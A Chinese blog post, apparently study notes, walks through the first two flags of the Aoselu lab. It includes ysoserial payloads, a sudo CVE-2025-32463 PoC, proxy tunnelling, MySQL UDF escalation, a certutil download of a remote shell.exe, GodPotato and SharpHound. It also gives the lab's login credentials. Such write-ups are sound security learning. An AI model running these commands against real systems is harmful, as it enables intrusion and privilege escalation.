[{"data":1,"prerenderedAt":792},["ShallowReactive",2],{"\u002Fposts\u002F8cbed0f":3,"surround-\u002Fposts\u002F8cbed0f":781},{"id":4,"title":5,"body":6,"categories":757,"date":759,"description":760,"draft":761,"extension":762,"image":763,"meta":764,"navigation":766,"path":767,"permalink":767,"published":763,"readingTime":768,"recommend":763,"references":763,"seo":773,"sitemap":774,"stem":775,"tags":776,"type":779,"updated":759,"__hash__":780},"content\u002Fposts\u002F2026\u002F渗透学习笔记-春秋云镜-Aoselu(flag1,2).md","渗透学习笔记-春秋云镜-Aoselu-flag1,2",{"type":7,"value":8,"toc":748},"minimark",[9,13,20,31,35,38,41,53,60,66,69,80,88,103,109,112,119,126,133,138,141,149,152,157,163,165,168,174,180,183,189,195,201,212,218,221,227,233,239,245,248,254,260,265,271,274,280,283,289,303,309,315,322,325,332,338,341,347,361,367,373,380,387,397,403,413,419,422,427,432,445,451,454,460,470,475,478,481,487,493,500,506,509,514,520,526,529,536,542,547,553,559,565,574,577,580,586,589,592,598,603,610,615,622,625,631,637,640,646,653,658,664,667,670,676,681,686,689,694,697,703,706,712,720,723,728,734,740],[10,11,5],"h2",{"id":12},"渗透学习笔记-春秋云镜-aoselu-flag12",[14,15,16],"blockquote",{},[17,18,19],"p",{},"结合AI与靶场学习渗透。\n本文使用的AI: gemini",[14,21,22],{},[17,23,24,25,30],{},"本靶场以虚构汽车制造企业 Aoselu 为背景，模拟其真实企业内部网络环境，玩家需要进行信息收集、权限提升、横向移动、服务利用等内网渗透技术，逐步获取4个flag。  目前已通过信息收集获得该企业某员工的邮箱 ：",[26,27,29],"a",{"href":28},"mailto:rachel.cook9@aoseluauto.com","rachel.cook9@aoseluauto.com","\u002F!QAZ2wsx",[32,33,34],"h3",{"id":34},"flag1",[17,36,37],{},"给出一个IP,访问是一个汽车网站。",[17,39,40],{},"fscan扫描",[17,42,43],{},[26,44,48],{"href":45,"rel":46},"https:\u002F\u002Fanm.sky233.top\u002Fa\u002FMjFZfPcy4MhBiswx",[47],"nofollow",[49,50],"img",{"alt":51,"src":52},"asciicast","https:\u002F\u002Fanm.sky233.top\u002Fa\u002FMjFZfPcy4MhBiswx.svg",[17,54,55],{},[26,56,59],{"href":57,"rel":58},"http:\u002F\u002F39.99.141.172:8080\u002F%E6%98%AF%E4%B8%AA%E7%99%BB%E5%BD%95%E9%A1%B5%E9%9D%A2%EF%BC%8C%E7%99%BB%E5%BD%95%E5%90%8E%E9%A1%B5%E9%9D%A2%E5%A6%82%E4%B8%8B%E3%80%82",[47],"http:\u002F\u002F39.99.141.172:8080\u002F是个登录页面，登录后页面如下。",[17,61,62],{},[49,63],{"alt":64,"src":65},"image-20260508141505444","assets\u002Fimage-20260508141505444.png",[17,67,68],{},"没有什么交互数据，查看cookie。",[70,71,76],"pre",{"className":72,"code":74,"language":75},[73],"language-text","rO0ABXNyACFjb20uYW9zZWx1YXV0by5tYWlsLnVzZXIuVXNlckluZm9s\u002Fh3I5rAIGwIABUkAA2FnZUwABWVtYWlsdAASTGphdmEvbGFuZy9TdHJpbmc7TAAKb2NjdXBhdGlvbnEAfgABTAAIcmVhbG5hbWVxAH4AAUwACHVzZXJuYW1lcQB+AAF4cAAAABx0ABtyYWNoZWwuY29vazlAYW9zZWx1YXV0by5jb210AAtTYWxlc3BlcnNvbnQAC1JhY2hlbCBDb29rdAAMcmFjaGVsLmNvb2s5\n","text",[77,78,74],"code",{"__ignoreMap":79},"",[17,81,82,83,87],{},"这是一个非常经典的 ",[84,85,86],"strong",{},"Java 反序列化漏洞 (Java Deserialization Vulnerability)"," 场景。",[17,89,90,91,94,95,98,99,102],{},"识别特征：userInfo Cookie 的值是以 ",[77,92,93],{"code":93},"rO0AB"," 开头的：\n",[77,96,97],{"code":97},"rO0ABXNyACFjb20uYW9zZWx1YXV0by5tYWlsLnVzZXIuVXNlckluZm9s...","\n在 Base64 编码中，rO0AB 解码后的十六进制字节是 ",[77,100,101],{"code":101},"AC ED 00 05","。这是 Java 序列化对象的魔术字节 (Magic Bytes)。这说明服务器把用户的会话信息或属性序列化后，Base64 编码放在了 Cookie 里。服务器在收到请求时，大概率会将其进行 Base64 解码，并使用 ObjectInputStream.readObject() 进行反序列化。",[17,104,105],{},[49,106],{"alt":107,"src":108},"image-20260508143313894","assets\u002Fimage-20260508143313894.png",[17,110,111],{},"步骤一：探测反序列化点 (使用 URLDNS 链)",[17,113,114,115,118],{},"在不知道后端到底使用了哪些第三方库（如 CommonsCollections、Spring 等）的黑盒情况下，最稳妥的第一步是使用 ",[84,116,117],{},"URLDNS"," 链。 URLDNS 链不依赖任何第三方库，使用的是 Java 原生类。它的作用是在反序列化时触发一次 DNS 请求，非常适合用来验证漏洞是否存在以及服务器是否出网。",[17,120,121,122,125],{},"准备一个 DNSLog 平台地址（例如 ",[77,123,124],{"code":124},"xxx.dnslog.cn","）。",[17,127,128,129,132],{},"使用经典的 Java 反序列化工具 ",[84,130,131],{},"ysoserial"," 生成 Payload：",[17,134,135],{},[77,136,137],{"code":137},"java -jar ysoserial.jar URLDNS \"http:\u002F\u002Fxxx.dnslog.cn\" > urldns.bin",[139,140],"hr",{},[70,142,147],{"className":143,"code":145,"language":146,"meta":79},[144],"language-bash","➜  ysoserial java -jar ysoserial-all.jar URLDNS \"http:\u002F\u002Fcnts7w.dnslog.cn\" > urldns.bin\nError while generating or serializing payload\njava.lang.reflect.InaccessibleObjectException: Unable to make field private int java.net.URL.hashCode accessible: module java.base does not \"opens java.net\" to unnamed module @6a522ee2\n\tat java.base\u002Fjava.lang.reflect.AccessibleObject.checkCanSetAccessible(AccessibleObject.java:354)\n\tat java.base\u002Fjava.lang.reflect.AccessibleObject.checkCanSetAccessible(AccessibleObject.java:297)\n\tat java.base\u002Fjava.lang.reflect.Field.checkCanSetAccessible(Field.java:178)\n\tat java.base\u002Fjava.lang.reflect.Field.setAccessible(Field.java:172)\n\tat ysoserial.payloads.util.Reflections.setAccessible(Reflections.java:26)\n\tat ysoserial.payloads.util.Reflections.getField(Reflections.java:34)\n\tat ysoserial.payloads.util.Reflections.setFieldValue(Reflections.java:44)\n\tat ysoserial.payloads.URLDNS.getObject(URLDNS.java:59)\n\tat ysoserial.GeneratePayload.main(GeneratePayload.java:34)\n➜  ysoserial java --version\nopenjdk 17.0.19 2026-04-21\nOpenJDK Runtime Environment (build 17.0.19+10)\nOpenJDK 64-Bit Server VM (build 17.0.19+10, mixed mode, sharing)\n","bash",[77,148,145],{"__ignoreMap":79},[17,150,151],{},"JDK版本碰到问题了，发现Arch可以很方便的切换JDK。",[17,153,154],{},[77,155,156],{"code":156},"https:\u002F\u002Fwiki.archlinux.org.cn\u002Ftitle\u002FJava",[70,158,161],{"className":159,"code":160,"language":146,"meta":79},[144],"➜  ysoserial archlinux-java\narchlinux-java \u003CCOMMAND>\n\nCOMMAND:\n\tstatus\t\tList installed Java environments and enabled one\n\tget\t\tReturn the short name of the Java environment set as default\n\tset \u003CJAVA_ENV>\tForce \u003CJAVA_ENV> as default\n\tunset\t\tUnset current default Java environment\n\tfix\t\tFix an invalid\u002Fbroken default Java environment configuration\n➜  ysoserial archlinux-java status\nAvailable Java environments:\n  java-17-openjdk (default)\n  java-8-openjdk\n➜  ysoserial archlinux-java set java-8-openjdk\nThis script must be run as root\n➜  ysoserial sudo archlinux-java set java-8-openjdk\n➜  ysoserial java -jar ysoserial-all.jar URLDNS \"http:\u002F\u002Fcnts7w.dnslog.cn\" > urldns.bin\n➜  ysoserial\n",[77,162,160],{"__ignoreMap":79},[139,164],{},[17,166,167],{},"然后继续",[70,169,172],{"className":170,"code":171,"language":146,"meta":79},[144],"➜  ysoserial java -jar ysoserial-all.jar URLDNS \"http:\u002F\u002Frvpl8h.dnslog.cn\" > urldns.bin\n➜  ysoserial cat urldns.bin | base64\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVz\naG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IADGphdmEubmV0LlVSTJYlNzYa\u002FORyAwAHSQAIaGFz\naENvZGVJAARwb3J0TAAJYXV0aG9yaXR5dAASTGphdmEvbGFuZy9TdHJpbmc7TAAEZmlsZXEAfgAD\nTAAEaG9zdHEAfgADTAAIcHJvdG9jb2xxAH4AA0wAA3JlZnEAfgADeHD\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F3QAEHJ2cGw4\naC5kbnNsb2cuY250AABxAH4ABXQABGh0dHBweHQAF2h0dHA6Ly9ydnBsOGguZG5zbG9nLmNueA==\n",[77,173,171],{"__ignoreMap":79},[17,175,176],{},[49,177],{"alt":178,"src":179},"image-20260508145515898","assets\u002Fimage-20260508145515898.png",[17,181,182],{},"返回个500,dnslog后台什么也不显示。。。。。不出网",[17,184,185,188],{},[77,186,187],{"code":187},"直接用yakit吧","，参考别的大佬的文章，CC8:SpringEcho可以触发。",[17,190,191],{},[49,192],{"alt":193,"src":194},"image-20260508153754431","assets\u002Fimage-20260508153754431.png",[17,196,197],{},[49,198],{"alt":199,"src":200},"image-20260508153740586","assets\u002Fimage-20260508153740586.png",[17,202,203,204,207,208,211],{},"改为",[77,205,206],{"code":206},"ls -al","，发现",[77,209,210],{"code":210},"flag.txt","需要root才能查看。先想办法连接上，但是这个服务器是不出网的。",[17,213,214],{},[49,215],{"alt":216,"src":217},"image-20260508153902925","assets\u002Fimage-20260508153902925.png",[17,219,220],{},"写个内存马进去。",[17,222,223],{},[49,224],{"alt":225,"src":226},"image-20260508192845343","assets\u002Fimage-20260508192845343.png",[17,228,229],{},[49,230],{"alt":231,"src":232},"image-20260508161536735","assets\u002Fimage-20260508161536735.png",[17,234,235],{},[49,236],{"alt":237,"src":238},"image-20260508192941701","assets\u002Fimage-20260508192941701.png",[17,240,241],{},[49,242],{"alt":243,"src":244},"image-20260508161635253","assets\u002Fimage-20260508161635253.png",[17,246,247],{},"连接上了。找找SUID，cmp提取flag.",[17,249,250],{},[49,251],{"alt":252,"src":253},"image-20260508161957765","assets\u002Fimage-20260508161957765.png",[17,255,256],{},[26,257,258],{"href":258,"rel":259},"https:\u002F\u002Fgtfobins.org\u002Fgtfobins\u002Fcmp\u002F",[47],[17,261,262],{},[77,263,264],{"code":264},"cmp \u002Fflag.txt \u002Fdev\u002Fzero -b -l",[17,266,267],{},[49,268],{"alt":269,"src":270},"image-20260508162207267","assets\u002Fimage-20260508162207267.png",[17,272,273],{},"flag是拿到了，想继续向下还得提取权限。",[70,275,278],{"className":276,"code":277,"language":75},[73],"\u002F >sudo -V\n\nSudo version 1.9.15p5\nSudoers policy plugin version 1.9.15p5\nSudoers file grammar version 50\nSudoers I\u002FO plugin version 1.9.15p5\nSudoers audit plugin version 1.9.15p5\n",[77,279,277],{"__ignoreMap":79},[17,281,282],{},"CVE-2025-32463",[17,284,285,288],{},[84,286,287],{},"易受攻击","：Sudo 1.9.14 ~ 1.9.17",[17,290,291,292,295,296,299,300],{},"找一个",[77,293,294],{"code":294},"poc",",传到",[77,297,298],{"code":298},"\u002Ftmp",",我这里改名为",[77,301,302],{"code":302},"g.sh",[17,304,305,308],{},[77,306,307],{"code":307},"chmod +x ","之后再执行",[17,310,311],{},[49,312],{"alt":313,"src":314},"image-20260508163357953","assets\u002Fimage-20260508163357953.png",[17,316,317,318,321],{},"现在是能用",[77,319,320],{"code":320},"sudo","权限执行了。",[32,323,324],{"id":324},"flag2",[17,326,327,328,331],{},"一般是先传上去一个",[77,329,330],{"code":330},"fscan","扫一下，但是还有个源码没看。",[17,333,334],{},[49,335],{"alt":336,"src":337},"image-20260508163953534","assets\u002Fimage-20260508163953534.png",[17,339,340],{},"下载下来到JADX看一下，有个内网的数据库，想办法连一下。",[17,342,343],{},[49,344],{"alt":345,"src":346},"image-20260508164105365","assets\u002Fimage-20260508164105365.png",[17,348,349,352,353,356,357,360],{},[77,350,351],{"code":351},"nc","测一下端口能否正常开放，",[77,354,355],{"code":355},"ping","一下果真不出网---",[77,358,359],{"code":359},"外界能访问，但是内部不出网",",代理搭建起来。",[17,362,363],{},[49,364],{"alt":365,"src":366},"image-20260508165344324","assets\u002Fimage-20260508165344324.png",[17,368,369],{},[49,370],{"alt":371,"src":372},"image-20260508164851928","assets\u002Fimage-20260508164851928.png",[17,374,375,376,379],{},"传一个",[77,377,378],{"code":378},"gost","上去，代理。",[17,381,382,383,386],{},"直接代数据库，发现不行",[77,384,385],{"code":385},"gost -L tcp:\u002F\u002F:9999\u002F172.16.52.45:3306","。ping也不通。。。",[17,388,389,392,393,396],{},[77,390,391],{"code":391},"直接代理","再用",[77,394,395],{"code":395},"Proxychain","试试。",[17,398,399],{},[49,400],{"alt":401,"src":402},"image-20260508171745503","assets\u002Fimage-20260508171745503.png",[17,404,405,408,409,412],{},[77,406,407],{"code":407},".\u002Fgost -L socks5:\u002F\u002F:1080","，先用",[77,410,411],{"code":411},"nmap","扫一下端口是开放了的。",[17,414,415,418],{},[77,416,417],{"code":417},"proxychains4 curl 127.0.0.1:8080","检测可用性，正常返回就是可用的。",[17,420,421],{},"怎么还连不上数据库！？",[17,423,424,425],{},"直接开扫，传个",[77,426,330],{"code":330},[17,428,429],{},[77,430,431],{"code":431},".\u002Fg.sh \u002Ftmp\u002Ffscan -h 172.16.52.45\u002F16 -o \u002Ftmp\u002Fnets.txt",[17,433,434,436,437,440,441,444],{},[77,435,330],{"code":330},"命令输入错了记得,",[77,438,439],{"code":439},"ps -ef","看一下，再",[77,442,443],{"code":443},".\u002Fg.sh kill -9 [PID]","结束一下，重新输入。",[17,446,447],{},[49,448],{"alt":449,"src":450},"image-20260508175818940","assets\u002Fimage-20260508175818940.png",[17,452,453],{},"关注这俩文件，就扫出来一个这个，没耐心等了。",[70,455,458],{"className":456,"code":457,"language":75},[73],"172.16.34.5\n",[77,459,457],{"__ignoreMap":79},[17,461,462,465,466,469],{},[77,463,464],{"code":464},"\u002F16","扫起来还是太麻烦了，扫",[77,467,468],{"code":468},"\u002F24",",先看34这个C段下的。",[17,471,472],{},[77,473,474],{"code":474},".\u002Fg.sh \u002Ftmp\u002Ffscan -h 172.16.34.1\u002F24 -o \u002Ftmp\u002F34_nets.txt",[17,476,477],{},"先扫了34的。",[17,479,480],{},"\u002Ftmp\u002F34_nets.txt",[70,482,485],{"className":483,"code":484,"language":146,"meta":79},[144],"# ===== 存活主机 =====\n172.16.34.23\n172.16.34.5\n\n# ===== 开放端口 =====\n172.16.34.5:445\n172.16.34.23:139\n172.16.34.5:139\n172.16.34.23:135\n172.16.34.5:135\n172.16.34.5:88\n172.16.34.5:53\n172.16.34.5:5000\n172.16.34.23:5000\n172.16.34.5:3268\n172.16.34.23:3389\n172.16.34.23:445\n172.16.34.5:3389\n172.16.34.5:5985\n172.16.34.23:5985\n172.16.34.5:389\n172.16.34.5:3269\n172.16.34.5:636\n\n# ===== 服务信息 =====\n172.16.34.5:3269 unknown\n172.16.34.5:636 unknown\n172.16.34.5:445 microsoft-ds SMB@ A q1, u A \" Q!R b P x `v + l0j \u003C0: + 7 * H * H * H + 7 *0( & $not_defined_in_RFC4178@please_ign...\nhttp:\u002F\u002F172.16.34.23:139\nhttp:\u002F\u002F172.16.34.5:139\n172.16.34.23:135 msrpc @\n172.16.34.5:135 msrpc @\n172.16.34.5:88 spark\n172.16.34.5:53 domain version bind\nhttp:\u002F\u002F172.16.34.23:5000 200 Werkzeug\u002F3.1.3 Python\u002F3.9.2 [werkzeug]\n172.16.34.23:445 microsoft-ds SMB@ A ~!w @ = w P x `v + l0j \u003C0: + 7 * H * H * H + 7 *0( & $not_defined_in_RFC4178@please_ignore\nhttp:\u002F\u002F172.16.34.5:5000 200 Werkzeug\u002F3.1.3 Python\u002F3.9.2 [werkzeug]\nhttp:\u002F\u002F172.16.34.23:3389\n172.16.34.5:3268 genetec-5400 0 d 0 0 domainFunctionality1 70 forestFunctionality1 70 ( domainControllerFunctionality1 70 5 rootDo...\nhttp:\u002F\u002F172.16.34.5:5985 [Not Found] 404 Microsoft-HTTPAPI\u002F2.0\nhttp:\u002F\u002F172.16.34.23:5985 [Not Found] 404 Microsoft-HTTPAPI\u002F2.0\nhttp:\u002F\u002F172.16.34.5:3389\n172.16.34.5:389 genetec-5400 0 d 0 0 domainFunctionality1 70 forestFunctionality1 70 ( domainControllerFunctionality1 70 5 rootDo...\n\n# ===== Web服务 =====\nhttp:\u002F\u002F172.16.34.23:139\nhttp:\u002F\u002F172.16.34.5:139\nhttp:\u002F\u002F172.16.34.23:5000\nhttp:\u002F\u002F172.16.34.5:5000\nhttp:\u002F\u002F172.16.34.23:3389\nhttp:\u002F\u002F172.16.34.5:5985\nhttp:\u002F\u002F172.16.34.23:5985\nhttp:\u002F\u002F172.16.34.5:3389\n",[77,486,484],{"__ignoreMap":79},[70,488,491],{"className":489,"code":490,"language":75},[73],"Extranet 172.16.53.30\nASLITPC03 172.16.36.21\nASLSRVFS02 172.16.34.23\nASLSRVAD05 172.16.34.5\n",[77,492,490],{"__ignoreMap":79},[17,494,495,496,499],{},"用官方给的吧。。",[77,497,498],{"code":498},"172.16.36.21","是数据库所在的机子，MDUT连不上啊。。。",[17,501,502],{},[49,503],{"alt":504,"src":505},"image-20260508182809776","assets\u002Fimage-20260508182809776.png",[17,507,508],{},"再尝试只代理端口，只不过ip变了。",[17,510,511],{},[77,512,513],{"code":513},"gost -L tcp:\u002F\u002F:9998\u002F172.16.36.21:3306",[17,515,516],{},[49,517],{"alt":518,"src":519},"image-20260508183218163","assets\u002Fimage-20260508183218163.png",[17,521,522],{},[49,523],{"alt":524,"src":525},"image-20260508183152476","assets\u002Fimage-20260508183152476.png",[17,527,528],{},"总算连接上了。。。",[17,530,531,532,535],{},"直接来一手",[77,533,534],{"code":534},"UDF","提权。",[17,537,538],{},[49,539],{"alt":540,"src":541},"image-20260508183345516","assets\u002Fimage-20260508183345516.png",[17,543,544],{},[77,545,546],{"code":546},"whoami \u002Fpriv",[17,548,549],{},[49,550],{"alt":551,"src":552},"image-20260508184132837","assets\u002Fimage-20260508184132837.png",[70,554,557],{"className":555,"code":556,"language":146,"meta":79},[144],"SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled\nSeImpersonatePrivilege        Impersonate a client after authentication Enabled\nSeCreateGlobalPrivilege       Create global objects                     Enabled\n",[77,558,556],{"__ignoreMap":79},[17,560,561,564],{},[84,562,563],{},"SeImpersonatePrivilege","是个好东西",[14,566,567],{},[17,568,569,570,573],{},"发现新装的Arch没工具，去取了个",[77,571,572],{"code":572},"vshell","，先中场休息。",[17,575,576],{},"重新启动了环境，",[17,578,579],{},"先生成一个正向客户端。",[17,581,582],{},[49,583],{"alt":584,"src":585},"image-20260508191032546","assets\u002Fimage-20260508191032546.png",[17,587,588],{},"再传过去，先用冰蝎传到入口机，入口机开个http服务，数据库机器再下载。",[17,590,591],{},"入口机器是有python的。",[17,593,594],{},[49,595],{"alt":596,"src":597},"image-20260508194106390","assets\u002Fimage-20260508194106390.png",[17,599,600],{},[77,601,602],{"code":602},"python3 -m http.server 8888",[17,604,605,606,609],{},"然后在",[77,607,608],{"code":608},"MDUT","上执行下面的命令下载，",[17,611,612],{},[77,613,614],{"code":614},"certutil.exe -urlcache -split -f http:\u002F\u002F172.16.53.30:8888\u002Fshell.exe  \"C:\\\\ProgramData\\\\MySQL\\\\MySQL Server 5.7\\\\Data\\\\shell.exe\"",[17,616,617,618,621],{},"然后再执行",[77,619,620],{"code":620},"shell.exe","运行。",[17,623,624],{},"回到Vshell连接。",[17,626,627],{},[49,628],{"alt":629,"src":630},"image-20260508195134461","assets\u002Fimage-20260508195134461.png",[17,632,633],{},[49,634],{"alt":635,"src":636},"image-20260508195145708","assets\u002Fimage-20260508195145708.png",[17,638,639],{},"进入shell",[17,641,642],{},[49,643],{"alt":644,"src":645},"image-20260508195940960","assets\u002Fimage-20260508195940960.png",[17,647,648,649,652],{},"传个",[77,650,651],{"code":651},"GodPotato","，",[17,654,655],{},[77,656,657],{"code":657},"GodPotato-NET4.exe -cmd \"cmd \u002Fc type C:\\Users\\Administrator\\Desktop\\flag.txt\"",[17,659,660],{},[49,661],{"alt":662,"src":663},"image-20260508200232651","assets\u002Fimage-20260508200232651.png",[17,665,666],{},"把shell.exe也用potato跑一下提升权限。",[17,668,669],{},"先结束原来的",[17,671,672,675],{},[77,673,674],{"code":674},"tasklist","看一下PID",[17,677,678],{},[77,679,680],{"code":680},"shell.exe                     4924 Services                   0     28,064 K",[17,682,683],{},[77,684,685],{"code":685},"taskkill \u002Fpid 4924 \u002FF",[17,687,688],{},"然后再回MDUT运行shell.exe",[17,690,691],{},[77,692,693],{"code":693},"GodPotato-NET4.exe -cmd \"cmd \u002Fc C:\\\\Users\\\\Public\\\\shell.exe\"",[17,695,696],{},"再连接。",[17,698,699],{},[49,700],{"alt":701,"src":702},"image-20260508202520038","assets\u002Fimage-20260508202520038.png",[17,704,705],{},"传个SharpHound上去",[17,707,708],{},[49,709],{"alt":710,"src":711},"image-20260508202812611","assets\u002Fimage-20260508202812611.png",[70,713,718],{"className":714,"code":716,"language":717,"meta":79},[715],"language-cmd","C:\\Users\\Public>SharpHound -c all\n2026-05-08T20:27:50.3451508-07:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound\n2026-05-08T20:27:50.5918745-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container\n, RDP, ObjectProps, DCOM, SPNTargets, PSRemote\n2026-05-08T20:27:50.6242910-07:00|INFORMATION|Initializing SharpHound at 8:27 PM on 5\u002F8\u002F2026\n2026-05-08T20:27:51.1031545-07:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for aoseluauto.com : ASLSRVAD05.aoseluauto.com\n2026-05-08T20:27:51.1487958-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DC\nOM, SPNTargets, PSRemote\n2026-05-08T20:27:51.3732652-07:00|INFORMATION|Beginning LDAP search for aoseluauto.com\n2026-05-08T20:27:51.4426141-07:00|INFORMATION|Producer has finished, closing LDAP channel\n2026-05-08T20:27:51.4524217-07:00|INFORMATION|LDAP channel closed, waiting for consumers\n2026-05-08T20:28:21.9764444-07:00|INFORMATION|Status: 0 objects finished (+0 0)\u002Fs -- Using 36 MB RAM\n2026-05-08T20:28:36.7558453-07:00|INFORMATION|Consumers finished, closing output channel\n2026-05-08T20:28:36.8209978-07:00|INFORMATION|Output channel closed, waiting for output task to complete\nClosing writers\n2026-05-08T20:28:36.9248141-07:00|INFORMATION|Status: 234 objects finished (+234 5.2)\u002Fs -- Using 44 MB RAM\n2026-05-08T20:28:36.9252461-07:00|INFORMATION|Enumeration finished in 00:00:45.5602768\n2026-05-08T20:28:37.0429893-07:00|INFORMATION|Saving cache with stats: 192 ID to type mappings.\n 193 name to SID mappings.\n 1 machine sid mappings.\n 2 sid to domain mappings.\n 0 global catalog mappings.\n2026-05-08T20:28:37.0570917-07:00|INFORMATION|SharpHound Enumeration Completed at 8:28 PM on 5\u002F8\u002F2026! Happy Graphing!\n","cmd",[77,719,716],{"__ignoreMap":79},[17,721,722],{},"下载同目录的安装包，传到BloodHunter",[17,724,725],{},[77,726,727],{"code":727},"Find Shortest Paths to Domain Admins",[17,729,730],{},[49,731],{"alt":732,"src":733},"image-20260508205950291","assets\u002Fimage-20260508205950291.png",[70,735,738],{"className":736,"code":737,"language":717,"meta":79},[715],"C:\\Users\\Public>net time \u002Fdomain\nCurrent time at \\\\ASLSRVAD05.aoseluauto.com is 5\u002F8\u002F2026 9:04:49 PM\n\nThe command completed successfully.\n",[77,739,737],{"__ignoreMap":79},[14,741,742,745],{},[17,743,744],{},"不会了捏，先写这么多。",[17,746,747],{},"QAQ",{"title":79,"searchDepth":749,"depth":749,"links":750},4,[751],{"id":12,"depth":752,"text":5,"children":753},2,[754,756],{"id":34,"depth":755,"text":34},3,{"id":324,"depth":755,"text":324},[758],"内网渗透","2026-05-09 11:17:48","渗透笔记",false,"md",null,{"slots":765},{},true,"\u002Fposts\u002F8cbed0f",{"text":769,"minutes":770,"time":771,"words":772},"8 min read",7.78,466800,1556,{"title":5,"description":760},{"loc":767},"posts\u002F2026\u002F渗透学习笔记-春秋云镜-Aoselu(flag1,2)",[777,778],"春秋云镜","渗透","tech","KL2yWZ6ynC5mHL0mQZ_5U-PnM-n-Fq1OHYL9kqlZ3qw",[782,787],{"title":783,"path":784,"stem":785,"date":786,"type":779,"children":-1},"自部署个人使用的Asciinema服务端","\u002Fposts\u002Fc5d8bf3","posts\u002F2026\u002F自部署个人使用的Asciinema服务端","2026-04-18 15:34:30",{"title":788,"path":789,"stem":790,"date":791,"type":779,"children":-1},"🚲旧博客内容恢复","\u002F2024","posts\u002F2024\u002F旧博客内容恢复","2024-05-12",1778729608182]